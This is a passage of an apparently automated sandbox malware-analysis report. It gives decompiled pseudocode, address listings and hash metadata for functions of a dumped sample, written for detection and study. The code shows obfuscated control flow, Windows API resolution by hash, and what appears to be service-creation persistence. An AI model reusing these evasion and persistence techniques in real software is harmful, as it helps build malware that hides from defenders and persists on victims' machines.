                                                                                0x007a6e7e
                                                                                0x007a6e83
                                                                                0x007a6e88
                                                                                0x007a6e90
                                                                                0x007a6e9c
                                                                                0x007a6ea0
                                                                                0x007a6f39
                                                                                0x007a6f39
                                                                                0x007a6ea6
                                                                                0x007a6eac
                                                                                0x007a6eae
                                                                                0x007a6ec8
                                                                                0x007a6ec8
                                                                                0x007a6ece
                                                                                0x007a6edb
                                                                                0x007a6ee3
                                                                                0x007a6ef4
                                                                                0x007a6ef8
                                                                                0x007a6f00
                                                                                0x007a6f08
                                                                                0x007a6f0d
                                                                                0x007a6f12
                                                                                0x007a6f1a
                                                                                0x007a6f22
                                                                                0x007a6f35
                                                                                0x007a6f35
                                                                                0x007a6f3b
                                                                                0x007a6f41
                                                                                0x007a6f43
                                                                                0x007a6f5b
                                                                                0x007a6f5d
                                                                                0x007a6f5d
                                                                                0x007a6f63
                                                                                0x007a6f70
                                                                                0x007a6f78
                                                                                0x007a6f86
                                                                                0x007a6f89
                                                                                0x007a6f8d
                                                                                0x007a6f95
                                                                                0x007a6f9d
                                                                                0x007a6fa2
                                                                                0x007a6fa7
                                                                                0x007a6faf
                                                                                0x007a6fb7
                                                                                0x007a6fbb
                                                                                0x007a6fc3
                                                                                0x007a6fc5
                                                                                0x00000000
                                                                                0x007a6d6c
                                                                                0x007a6d6c
                                                                                0x007a6d71
                                                                                0x007a6dc2
                                                                                0x007a6dc7
                                                                                0x00000000
                                                                                0x007a6dcd
                                                                                0x007a6dcd
                                                                                0x00000000
                                                                                0x007a6dcd
                                                                                0x007a6d73
                                                                                0x007a6d73
                                                                                0x007a707a
                                                                                0x007a6d79
                                                                                0x007a6d79
                                                                                0x007a6d7e
                                                                                0x007a6d9e
                                                                                0x007a6da3
                                                                                0x007a6dae
                                                                                0x007a6dba
                                                                                0x00000000
                                                                                0x007a6d80
                                                                                0x007a6d80
                                                                                0x007a6d85
                                                                                0x00000000
                                                                                0x007a6d8b
                                                                                0x007a6d90
                                                                                0x007a6d94
                                                                                0x00000000
                                                                                0x007a6d94
                                                                                0x007a6d85
                                                                                0x007a6d7e
                                                                                0x007a6d73
                                                                                0x007a6d71
                                                                                0x007a6d6a
                                                                                0x007a6be5
                                                                                0x007a6be5
                                                                                0x007a6d00
                                                                                0x007a6d05
                                                                                0x007a6d07
                                                                                0x007a6d0e
                                                                                0x007a6d13
                                                                                0x007a6d1a
                                                                                0x007a6d1f
                                                                                0x007a6d1f
                                                                                0x007a6d26
                                                                                0x007a6d28
                                                                                0x007a6d2d
                                                                                0x007a6d2f
                                                                                0x007a6d36
                                                                                0x007a6d3b
                                                                                0x007a6d42
                                                                                0x007a6d47
                                                                                0x007a6d47
                                                                                0x007a6d53
                                                                                0x007a6d55
                                                                                0x00000000
                                                                                0x007a6beb
                                                                                0x007a6beb
                                                                                0x007a6bf0
                                                                                0x007a6ca1
                                                                                0x007a6ca6
                                                                                0x007a6ce6
                                                                                0x007a6ceb
                                                                                0x00000000
                                                                                0x007a6cf1
                                                                                0x007a6cf1
                                                                                0x007a6cf6
                                                                                0x00000000
                                                                                0x007a6cf6
                                                                                0x007a6ca8
                                                                                0x007a6ca8
                                                                                0x007a6ccf
                                                                                0x007a6cd4
                                                                                0x007a6cd6
                                                                                0x00000000
                                                                                0x007a6cdc
                                                                                0x007a6cdc
                                                                                0x00000000
                                                                                0x007a6cdc
                                                                                0x007a6caa
                                                                                0x007a6caa
                                                                                0x007a6caf
                                                                                0x007a706d
                                                                                0x007a6cb5
                                                                                0x007a6cb5
                                                                                0x007a6cba
                                                                                0x00000000
                                                                                0x007a6cc0
                                                                                0x007a6cc0
                                                                                0x007a6cc5
                                                                                0x00000000
                                                                                0x007a6cc5
                                                                                0x007a6cba
                                                                                0x007a6caf
                                                                                0x007a6ca8
                                                                                0x007a6bf6
                                                                                0x007a6bf6
                                                                                0x007a6c8a
                                                                                0x007a6c8f
                                                                                0x007a6c91
                                                                                0x007a6dd2
                                                                                0x007a6dd9
                                                                                0x007a6c97
                                                                                0x007a6c97
                                                                                0x00000000
                                                                                0x007a6c97
                                                                                0x007a6bfc
                                                                                0x007a6bfc
                                                                                0x007a6c01
                                                                                0x007a6c67
                                                                                0x007a6c6c
                                                                                0x00000000
                                                                                0x007a6c72
                                                                                0x007a6c72
                                                                                0x007a6c79
                                                                                0x007a6c80
                                                                                0x00000000
                                                                                0x007a6c80
                                                                                0x007a6c03
                                                                                0x007a6c03
                                                                                0x007a6c59
                                                                                0x007a6c5d
                                                                                0x00000000
                                                                                0x007a6c05
                                                                                0x007a6c05
                                                                                0x007a6c0a
                                                                                0x007a6c26
                                                                                0x007a6c3a
                                                                                0x007a6c3e
                                                                                0x007a6c45
                                                                                0x007a6c4a
                                                                                0x007a6601
                                                                                0x007a6601
                                                                                0x00000000
                                                                                0x007a6c0c
                                                                                0x007a6c0c
                                                                                0x007a6c11
                                                                                0x00000000
                                                                                0x007a6c17
                                                                                0x007a6c17
                                                                                0x007a6c1c
                                                                                0x00000000
                                                                                0x007a6c1c
                                                                                0x007a6c11
                                                                                0x007a6c0a
                                                                                0x007a6c03
                                                                                0x007a6c01
                                                                                0x007a6bf6
                                                                                0x007a6bf0
                                                                                0x007a6be5
                                                                                0x00000000
                                                                                0x007a68d4
                                                                                0x007a68d4
                                                                                0x007a68d4
                                                                                0x007a68e6
                                                                                0x00000000
                                                                                0x007a68e6
                                                                                0x007a6601

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2284406713.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                                                                • Associated: 00000008.00000002.2284403091.00000000007A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284418757.00000000007AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284422950.00000000007AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7a0000_tmp_e473b4.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick
                                                                                • String ID: 9G$9G$Cr7$Cr7$IK
                                                                                • API String ID: 536389180-1575203827
                                                                                • Opcode ID: 68627f21f1610730cabdddc296b72b0d7a1fac1520e7b053a10b833f723d83fa
                                                                                • Instruction ID: 0a3b6609063a727f81475d9666743ebac9c12d82c7f7d506d4b538c3cef38246
                                                                                • Opcode Fuzzy Hash: 68627f21f1610730cabdddc296b72b0d7a1fac1520e7b053a10b833f723d83fa
                                                                                • Instruction Fuzzy Hash: CB32C671608301CBCB18DF68948912FB6E5ABE2754F284B2DF556C7262EA3CCD448BD3
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 007A78B0, Relevance: 7.7, Strings: 6, Instructions: 237COMMONCrypto
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 59%
                                                                                			E007A78B0() {
				char _v520;
				char _v524;
				signed int _v528;
				intOrPtr _v532;
				signed int _v536;
				signed int _v540;
				unsigned int _v544;
				signed int _v548;
				signed int _v552;
				intOrPtr _v560;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t84;
				signed int _t85;
				signed int _t89;
				void* _t91;
				intOrPtr* _t98;
				intOrPtr* _t100;
				intOrPtr _t145;
				intOrPtr* _t148;
				intOrPtr* _t150;
				char _t157;
				intOrPtr _t158;
				short* _t159;
				signed int _t160;
				void* _t162;
				void* _t163;
				signed int* _t164;
				void* _t166;

				_t164 =  &_v552;
				_v528 = 0x6831;
				_v528 = _v528 >> 0xf;
				_v528 = _v528 ^ 0x80000001;
				_v540 = 0x327e;
				_v540 = _v540 + 0xffffab47;
				_v540 = _v540 | 0x0907f9bb;
				_v540 = _v540 ^ 0xfffffdff;
				_v536 = 0xabbb;
				_v536 = _v536 + 0x21b1;
				_v536 = _v536 ^ 0x0000cd6c;
				_v552 = 0x2b65;
				_v552 = _v552 + 0xffff264b;
				_v552 = _v552 ^ 0xa26386a9;
				_v552 = _v552 >> 0xa;
				_v552 = _v552 | 0xc292eff0;
				_v552 = _v552 ^ 0xc297eff7;
				_v544 = 0x4147;
				_v544 = _v544 >> 4;
				_v544 = _v544 + 0x49ca;
				_v544 = _v544 ^ 0x00004dde;
				_v548 = 0x16b6;
				_v532 = 0;
				_v548 = 0x3e0f83e1 * _v548 >> 0x20 >> 3;
				_v548 = _v548 + 0xffff3e41;
				_v548 = _v548 ^ 0xffff3ef0;
				_t157 = _v524;
				_t160 = 0x251b1a18;
				goto L1;
				do {
					while(1) {
						L1:
						_t166 = _t160 - 0x22925463;
						if(_t166 > 0) {
							break;
						}
						if(_t166 == 0) {
							_t162 = E007A34C0(0x7ad940);
							_t74 =  *0x7ae158;
							if(_t74 == 0) {
								_t74 = E007A3E60(_t112, E007A3F00(0xc6fbcd74), 0xba71dd03, _t163);
								 *0x7ae158 = _t74;
							}
							_t145 =  *0x7ae54c; // 0x8df0b0
							_t59 = _t145 + 0x260; // 0x8df310
							_t60 = _t145 + 0x18; // 0x8df0c8
							 *_t74( &_v520, 0x104, _t162, _t60, _t59);
							_t76 =  *0x7ae494;
							_t164 =  &(_t164[5]);
							if(_t76 == 0) {
								_t76 = E007A3E60(_t112, E007A3F00(0x9bab0b12), 0x7facde30, _t163);
								 *0x7ae494 = _t76;
							}
							_t112 =  *_t76();
							_t78 =  *0x7adf30;
							if(_t78 == 0) {
								_t78 = E007A3E60(_t112, E007A3F00(0x9bab0b12), 0x5010a54d, _t163);
								 *0x7adf30 = _t78;
							}
							 *_t78(_t112, 0, _t162);
							_t160 = 0xcb26f9d;
							continue;
						} else {
							if(_t160 == 0x1dc498f) {
								_t80 =  *0x7adcf4; // 0x0
								if(_t80 == 0) {
									_t80 = E007A3E60(_t112, E007A3F00(0x26f5757c), 0x57afd2ae, _t163);
									 *0x7adcf4 = _t80;
								}
								 *_t80(_v524);
								return _v536;
							} else {
								if(_t160 == 0xcb26f9d) {
									_t158 =  *0x7ae54c; // 0x8df0b0
									_t159 = _t158 + 0x260;
									while( *_t159 != 0x5c) {
										_t159 = _t159 + 2;
									}
									_t157 = _t159 + 2;
									_t160 = 0x3b2cc327;
									continue;
								} else {
									if(_t160 != 0xe3d60ec) {
										goto L30;
									} else {
										_t84 =  *0x7ae35c;
										if(_t84 == 0) {
											_t84 = E007A3E60(_t112, E007A3F00(0x9bab0b12), 0x24b1f8f2, _t163);
											 *0x7ae35c = _t84;
										}
										_t85 =  *_t84( &_v520);
										_t148 =  *0x7ae264; // 0x0
										_v536 = 2 + _t85 * 2;
										if(_t148 == 0) {
											_t148 = E007A3E60(_t112, E007A3F00(0x26f5757c), 0x63466134, _t163);
											 *0x7ae264 = _t148;
										}
										_t89 =  *_t148(_v528, _t157, _v548, _v552,  &_v524, _v536);
										_t160 = 0x1dc498f;
										asm("sbb ebx, ebx");
										_t112 =  ~_t89 + 1;
										_v560 =  ~_t89 + 1;
										continue;
									}
								}
							}
						}
						L36:
					}
					if(_t160 == 0x251b1a18) {
						_t160 = 0x22925463;
						goto L1;
					} else {
						if(_t160 == 0x3b2cc327) {
							_t91 = E007A34C0(0x7ad9c0);
							_t150 =  *0x7adbcc; // 0x0
							_t163 = _t91;
							if(_t150 == 0) {
								_t150 = E007A3E60(_t112, E007A3F00(0x26f5757c), 0xc7fc2e0, _t163);
								 *0x7adbcc = _t150;
							}
							 *_t150(_v528, _t163, _v540, 0, _v536, _v552, 0,  &_v524, 0);
							asm("sbb esi, esi");
							_t98 =  *0x7ae494;
							_t160 = (_t160 & 0x1c0fc192) + 0xe3d60ec;
							if(_t98 == 0) {
								_t98 = E007A3E60(_t112, E007A3F00(0x9bab0b12), 0x7facde30, _t163);
								 *0x7ae494 = _t98;
							}
							_t112 =  *_t98();
							_t100 =  *0x7adf30;
							if(_t100 == 0) {
								_t100 = E007A3E60(_t112, E007A3F00(0x9bab0b12), 0x5010a54d, _t163);
								 *0x7adf30 = _t100;
							}
							 *_t100(_t112, 0, _t163);
						}
						goto L30;
					}
					goto L36;
					L30:
				} while (_t160 != 0x2a4d227e);
				return _v532;
				goto L36;
			}




































                                                                                0x007a78b0
                                                                                0x007a78ba
                                                                                0x007a78c4
                                                                                0x007a78c9
                                                                                0x007a78d1
                                                                                0x007a78d9
                                                                                0x007a78e1
                                                                                0x007a78e9
                                                                                0x007a78f1
                                                                                0x007a78f9
                                                                                0x007a7901
                                                                                0x007a7909
                                                                                0x007a7911
                                                                                0x007a7919
                                                                                0x007a7921
                                                                                0x007a7926
                                                                                0x007a792e
                                                                                0x007a7936
                                                                                0x007a793e
                                                                                0x007a7943
                                                                                0x007a794b
                                                                                0x007a7953
                                                                                0x007a795f
                                                                                0x007a796d
                                                                                0x007a7971
                                                                                0x007a7979
                                                                                0x007a7981
                                                                                0x007a7985
                                                                                0x007a7985
                                                                                0x007a7990
                                                                                0x007a7990
                                                                                0x007a7990
                                                                                0x007a7990
                                                                                0x007a7996
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x007a799c
                                                                                0x007a7a86
                                                                                0x007a7a88
                                                                                0x007a7a8f
                                                                                0x007a7aa2
                                                                                0x007a7aa7
                                                                                0x007a7aa7
                                                                                0x007a7aac
                                                                                0x007a7ab2
                                                                                0x007a7ab9
                                                                                0x007a7ac8
                                                                                0x007a7aca
                                                                                0x007a7acf
                                                                                0x007a7ad4
                                                                                0x007a7ae7
                                                                                0x007a7aec
                                                                                0x007a7aec
                                                                                0x007a7af3
                                                                                0x007a7af5
                                                                                0x007a7afc
                                                                                0x007a7b0f
                                                                                0x007a7b14
                                                                                0x007a7b14
                                                                                0x007a7b1d
                                                                                0x007a7b1f
                                                                                0x00000000
                                                                                0x007a79a2
                                                                                0x007a79a8
                                                                                0x007a7c1e
                                                                                0x007a7c25
                                                                                0x007a7c38
                                                                                0x007a7c3d
                                                                                0x007a7c3d
                                                                                0x007a7c46
                                                                                0x007a7c56
                                                                                0x007a79ae
                                                                                0x007a79b4
                                                                                0x007a7a54
                                                                                0x007a7a5a
                                                                                0x007a7a64
                                                                                0x007a7a66
                                                                                0x007a7a69
                                                                                0x007a7a6f
                                                                                0x007a7a72
                                                                                0x00000000
                                                                                0x007a79ba
                                                                                0x007a79c0
                                                                                0x00000000
                                                                                0x007a79c6
                                                                                0x007a79c6
                                                                                0x007a79cd
                                                                                0x007a79e0
                                                                                0x007a79e5
                                                                                0x007a79e5
                                                                                0x007a79ef
                                                                                0x007a79f1
                                                                                0x007a79fe
                                                                                0x007a7a04
                                                                                0x007a7a1c
                                                                                0x007a7a1e
                                                                                0x007a7a1e
                                                                                0x007a7a3d
                                                                                0x007a7a41
                                                                                0x007a7a48
                                                                                0x007a7a4a
                                                                                0x007a7a4b
                                                                                0x00000000
                                                                                0x007a7a4b
                                                                                0x007a79c0
                                                                                0x007a79b4
                                                                                0x007a79a8
                                                                                0x00000000
                                                                                0x007a799c
                                                                                0x007a7b2f
                                                                                0x007a7c14
                                                                                0x00000000
                                                                                0x007a7b35
                                                                                0x007a7b3b
                                                                                0x007a7b46
                                                                                0x007a7b4b
                                                                                0x007a7b51
                                                                                0x007a7b55
                                                                                0x007a7b6d
                                                                                0x007a7b6f
                                                                                0x007a7b6f
                                                                                0x007a7b95
                                                                                0x007a7b99
                                                                                0x007a7b9b
                                                                                0x007a7ba6
                                                                                0x007a7bae
                                                                                0x007a7bc1
                                                                                0x007a7bc6
                                                                                0x007a7bc6
                                                                                0x007a7bcd
                                                                                0x007a7bcf
                                                                                0x007a7bd6
                                                                                0x007a7be9
                                                                                0x007a7bee
                                                                                0x007a7bee
                                                                                0x007a7bf7
                                                                                0x007a7bf7
                                                                                0x00000000
                                                                                0x007a7b3b
                                                                                0x00000000
                                                                                0x007a7bf9
                                                                                0x007a7bf9
                                                                                0x007a7c13
                                                                                0x00000000

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2284406713.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                                                                • Associated: 00000008.00000002.2284403091.00000000007A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284418757.00000000007AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284422950.00000000007AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7a0000_tmp_e473b4.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 1h$4aFc$GA$e+$~"M*$~2
                                                                                • API String ID: 0-3245399214
                                                                                • Opcode ID: 7eb7ec7a135ea7d2889ad06f771d85197dd57ae01662b3ddff6e87d7252596d4
                                                                                • Instruction ID: fc451d71dcf3ec90fa7028a118d12b940e14610d4f71db7039b363c378815f2c
                                                                                • Opcode Fuzzy Hash: 7eb7ec7a135ea7d2889ad06f771d85197dd57ae01662b3ddff6e87d7252596d4
                                                                                • Instruction Fuzzy Hash: 9E91D271A083028FD718DF68DC8562BB7E9ABD6704F004B2DF49697255E778DE048B92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 007A8970, Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 65%
                                                                                			E007A8970() {
				char _v520;
				void* _v524;
				intOrPtr _v576;
				void* __ebx;
				void* __ebp;
				void* _t11;
				intOrPtr* _t12;
				intOrPtr* _t15;
				void* _t20;
				intOrPtr* _t28;
				intOrPtr* _t32;
				void* _t35;
				intOrPtr _t41;
				intOrPtr* _t53;
				intOrPtr _t58;
				void* _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				short* _t62;
				intOrPtr _t63;
				void* _t64;
				void* _t66;
				void* _t67;

				_t64 =  &_v524;
				_t58 = 0;
				_t11 = 0x7c4f4b3;
				_v524 = 0;
				_t35 = _v524;
				_t63 = _v524;
				_t60 = _v524;
				goto L1;
				do {
					while(1) {
						L1:
						_t66 = _t11 - 0x264c1972;
						if(_t66 > 0) {
							break;
						}
						if(_t66 == 0) {
							_t61 =  *0x7ae54c; // 0x8df0b0
							_t62 = _t61 + 0x260;
							while( *_t62 != 0x5c) {
								_t62 = _t62 + 2;
							}
							_t60 = _t62 + 2;
							_t11 = 0x1548988d;
							continue;
						} else {
							_t67 = _t11 - 0x1548988d;
							if(_t67 > 0) {
								if(_t11 != 0x1d74b649) {
									goto L24;
								} else {
									_t20 = E007A34C0(0x7ad940);
									_t53 =  *0x7ae158;
									_t59 = _t20;
									if(_t53 == 0) {
										_t53 = E007A3E60(_t35, E007A3F00(0xc6fbcd74), 0xba71dd03, _t63);
										 *0x7ae158 = _t53;
									}
									_t41 =  *0x7ae54c; // 0x8df0b0
									_t5 = _t41 + 0x260; // 0x8df310
									_t6 = _t41 + 0x18; // 0x8df0c8
									 *_t53( &_v520, 0x104, _t59, _t6, _t5);
									_t64 = _t64 + 0x14;
									E007A3460(_t59);
									_t58 = _v524;
									_t11 = 0x264c1972;
									continue;
								}
							} else {
								if(_t67 == 0) {
									_t28 =  *0x7ae310;
									if(_t28 == 0) {
										_t28 = E007A3E60(_t35, E007A3F00(0x26f5757c), 0x9ba7cd1, _t63);
										 *0x7ae310 = _t28;
									}
									_t35 =  *_t28(0, 0, 0xf003f);
									if(_t35 == 0) {
										goto L37;
									} else {
										_t11 = 0x308961ad;
										continue;
									}
								} else {
									if(_t11 == 0x45d0fe6) {
										_t32 =  *0x7ae18c;
										if(_t32 == 0) {
											_t32 = E007A3E60(_t35, E007A3F00(0x26f5757c), 0x268fe5f0, _t63);
											 *0x7ae18c = _t32;
										}
										 *_t32(_t35);
										L37:
										return _t58;
									} else {
										if(_t11 != 0x7c4f4b3) {
											goto L24;
										} else {
											_t11 = 0x1d74b649;
											continue;
										}
									}
								}
							}
						}
						L38:
					}
					if(_t11 == 0x2f0a6372) {
						_t12 =  *0x7ae18c;
						if(_t12 == 0) {
							_t12 = E007A3E60(_t35, E007A3F00(0x26f5757c), 0x268fe5f0, _t63);
							 *0x7ae18c = _t12;
						}
						 *_t12(_t63);
						goto L33;
					} else {
						if(_t11 == 0x308961ad) {
							_t15 =  *0x7ae404;
							if(_t15 == 0) {
								_t15 = E007A3E60(_t35, E007A3F00(0x26f5757c), 0xb4a05b4b, _t63);
								 *0x7ae404 = _t15;
							}
							_t63 =  *_t15(_t35, _t60, _t60, 2, 0x10, 2, 0,  &_v520, 0, 0, 0, 0, 0);
							if(_t63 == 0) {
								L33:
								_t11 = 0x45d0fe6;
							} else {
								_t58 = 1;
								_t11 = 0x3740ac4f;
								_v576 = 1;
							}
							goto L1;
						} else {
							if(_t11 != 0x3740ac4f) {
								goto L24;
							} else {
								E007A5040(_t35, _t63);
								_t11 = 0x2f0a6372;
								goto L1;
							}
						}
					}
					goto L38;
					L24:
				} while (_t11 != 0xb646886);
				return _t58;
				goto L38;
			}


























                                                                                0x007a8970
                                                                                0x007a897a
                                                                                0x007a897c
                                                                                0x007a8981
                                                                                0x007a8985
                                                                                0x007a8989
                                                                                0x007a898d
                                                                                0x007a898d
                                                                                0x007a8991
                                                                                0x007a8991
                                                                                0x007a8991
                                                                                0x007a8991
                                                                                0x007a8996
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x007a899c
                                                                                0x007a8a7d
                                                                                0x007a8a83
                                                                                0x007a8a8d
                                                                                0x007a8a90
                                                                                0x007a8a93
                                                                                0x007a8a99
                                                                                0x007a8a9c
                                                                                0x00000000
                                                                                0x007a89a2
                                                                                0x007a89a2
                                                                                0x007a89a7
                                                                                0x007a8a0d
                                                                                0x00000000
                                                                                0x007a8a13
                                                                                0x007a8a18
                                                                                0x007a8a1d
                                                                                0x007a8a23
                                                                                0x007a8a27
                                                                                0x007a8a3f
                                                                                0x007a8a41
                                                                                0x007a8a41
                                                                                0x007a8a47
                                                                                0x007a8a4d
                                                                                0x007a8a54
                                                                                0x007a8a63
                                                                                0x007a8a65
                                                                                0x007a8a6a
                                                                                0x007a8a6f
                                                                                0x007a8a73
                                                                                0x00000000
                                                                                0x007a8a73
                                                                                0x007a89a9
                                                                                0x007a89a9
                                                                                0x007a89c8
                                                                                0x007a89cf
                                                                                0x007a89e2
                                                                                0x007a89e7
                                                                                0x007a89e7
                                                                                0x007a89f7
                                                                                0x007a89fb
                                                                                0x00000000
                                                                                0x007a8a01
                                                                                0x007a8a01
                                                                                0x00000000
                                                                                0x007a8a01
                                                                                0x007a89ab
                                                                                0x007a89b0
                                                                                0x007a8b74
                                                                                0x007a8b7b
                                                                                0x007a8b8e
                                                                                0x007a8b93
                                                                                0x007a8b93
                                                                                0x007a8b99
                                                                                0x007a8b9b
                                                                                0x007a8ba7
                                                                                0x007a89b6
                                                                                0x007a89bb
                                                                                0x00000000
                                                                                0x007a89c1
                                                                                0x007a89c1
                                                                                0x00000000
                                                                                0x007a89c1
                                                                                0x007a89bb
                                                                                0x007a89b0
                                                                                0x007a89a9
                                                                                0x007a89a7
                                                                                0x00000000
                                                                                0x007a899c
                                                                                0x007a8aab
                                                                                0x007a8b43
                                                                                0x007a8b4a
                                                                                0x007a8b5d
                                                                                0x007a8b62
                                                                                0x007a8b62
                                                                                0x007a8b68
                                                                                0x00000000
                                                                                0x007a8ab1
                                                                                0x007a8ab6
                                                                                0x007a8aea
                                                                                0x007a8af1
                                                                                0x007a8b04
                                                                                0x007a8b09
                                                                                0x007a8b09
                                                                                0x007a8b2a
                                                                                0x007a8b2e
                                                                                0x007a8b6a
                                                                                0x007a8b6a
                                                                                0x007a8b30
                                                                                0x007a8b30
                                                                                0x007a8b35
                                                                                0x007a8b3a
                                                                                0x007a8b3a
                                                                                0x00000000
                                                                                0x007a8ab8
                                                                                0x007a8abd
                                                                                0x00000000
                                                                                0x007a8abf
                                                                                0x007a8ac3
                                                                                0x007a8ac8
                                                                                0x00000000
                                                                                0x007a8ac8
                                                                                0x007a8abd
                                                                                0x007a8ab6
                                                                                0x00000000
                                                                                0x007a8ad2
                                                                                0x007a8ad2
                                                                                0x007a8ae9
                                                                                0x00000000

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2284406713.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                                                                • Associated: 00000008.00000002.2284403091.00000000007A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284418757.00000000007AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284422950.00000000007AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7a0000_tmp_e473b4.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: rc/$rc/
                                                                                • API String ID: 0-3664441713
                                                                                • Opcode ID: e442602efdf43ab34aede5cf2e4f62f77acaf4ca12b4aa914180659a31c07c84
                                                                                • Instruction ID: 5f78355e472b0cae6459caab1fc93212b34396d03477575bc20d49e2dc3aa684
                                                                                • Opcode Fuzzy Hash: e442602efdf43ab34aede5cf2e4f62f77acaf4ca12b4aa914180659a31c07c84
                                                                                • Instruction Fuzzy Hash: D251D8B1B082059BDB649E68988573B7399E7D7314F148A2AF585CB342EF3CDC054793
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 007A1C70, Relevance: 1.4, Strings: 1, Instructions: 109COMMONCrypto
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 66%
                                                                                			E007A1C70(void* __ecx) {
				char _v4;
				signed int _v8;
				signed int _v12;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t67;
				signed int _t68;
				intOrPtr* _t74;
				signed int _t75;
				intOrPtr* _t77;
				int _t83;
				void* _t88;
				signed int _t90;
				signed int _t98;
				void* _t120;
				void* _t124;
				void* _t125;
				signed int _t127;
				signed int* _t128;

				_t128 =  &_v12;
				_v12 = 0x1438;
				_v12 = _v12 + 0x196e;
				_v12 = _v12 >> 2;
				_v12 = _v12 | 0x4103c642;
				_v12 = _v12 ^ 0xedf17400;
				_v12 = _v12 | 0xf7eeecf7;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0x7fff7ff7;
				_v8 = 0xf51;
				_t124 = __ecx;
				_v8 = _v8 * 0x15;
				_v8 = _v8 ^ 0x8db737d8;
				_v8 = _v8 ^ 0x4633f7b0;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 << 1;
				_v8 = _v8 + 0x7b9a;
				_v8 = _v8 ^ 0x576c4176;
				_t67 =  *0x7ade08;
				if(_t67 == 0) {
					_t67 = E007A3E60(_t88, E007A3F00(0x9bab0b12), 0xd8ef4c49, _t125);
					 *0x7ade08 = _t67;
				}
				_t68 =  *_t67();
				_v8 = 0x85c4;
				_t127 = _v12 + _t68 % _v8;
				_v8 = _v8 + 0xffffe6b2;
				_v8 = _v8 + 0xffff2952;
				_v8 = _v8 + 0xffffdb08;
				_v8 = 0x38e38e39 * _v8 >> 0x20 >> 1;
				_v8 = _v8 + 0xffffe3ba;
				_v8 = _v8 ^ 0x5caaf9ac;
				_v8 = _v8 ^ 0x40db6349;
				_v12 = 0xd311;
				_v12 = 0xaaaaaaab * _v12 >> 0x20 >> 4;
				_v12 = _v12 ^ 0x4a159b21;
				_v12 = _v12 ^ 0x4a1593fa;
				_t74 =  *0x7ade08;
				if(_t74 == 0) {
					_t74 = E007A3E60(_t88, E007A3F00(0x9bab0b12), 0xd8ef4c49, _t127);
					 *0x7ade08 = _t74;
				}
				_t75 =  *_t74();
				_t77 =  *0x7ade08;
				_t90 = _v8 + _t75 % _v12;
				if(_t77 == 0) {
					_t77 = E007A3E60(_t90, E007A3F00(0x9bab0b12), 0xd8ef4c49, _t127);
					 *0x7ade08 = _t77;
				}
				_v4 =  *_t77();
				if(_t127 != 0) {
					_t120 = _t124;
					_t98 = _t127 >> 1;
					_t124 = _t124 + _t127 * 2;
					_t83 = memset(_t120, 0x2d002d, _t98 << 2);
					asm("adc ecx, ecx");
					memset(_t120 + _t98, _t83, 0);
					_t128 =  &(_t128[6]);
				}
				E007A4EA0(_t124, _t90,  &_v4);
				 *((short*)(_t124 + _t90 * 2)) = 0;
				return 0;
			}






















                                                                                0x007a1c70
                                                                                0x007a1c73
                                                                                0x007a1c7a
                                                                                0x007a1c81
                                                                                0x007a1c85
                                                                                0x007a1c8c
                                                                                0x007a1c93
                                                                                0x007a1c9a
                                                                                0x007a1c9d
                                                                                0x007a1ca4
                                                                                0x007a1cb4
                                                                                0x007a1cb6
                                                                                0x007a1cba
                                                                                0x007a1cc2
                                                                                0x007a1ccf
                                                                                0x007a1cd3
                                                                                0x007a1cd7
                                                                                0x007a1cdf
                                                                                0x007a1ce7
                                                                                0x007a1cee
                                                                                0x007a1d01
                                                                                0x007a1d06
                                                                                0x007a1d06
                                                                                0x007a1d0b
                                                                                0x007a1d1e
                                                                                0x007a1d26
                                                                                0x007a1d28
                                                                                0x007a1d30
                                                                                0x007a1d38
                                                                                0x007a1d4d
                                                                                0x007a1d51
                                                                                0x007a1d59
                                                                                0x007a1d61
                                                                                0x007a1d69
                                                                                0x007a1d7a
                                                                                0x007a1d7e
                                                                                0x007a1d86
                                                                                0x007a1d8e
                                                                                0x007a1d95
                                                                                0x007a1da8
                                                                                0x007a1dad
                                                                                0x007a1dad
                                                                                0x007a1db2
                                                                                0x007a1dc0
                                                                                0x007a1dc5
                                                                                0x007a1dc9
                                                                                0x007a1ddc
                                                                                0x007a1de1
                                                                                0x007a1de1
                                                                                0x007a1de8
                                                                                0x007a1dee
                                                                                0x007a1df3
                                                                                0x007a1df5
                                                                                0x007a1df7
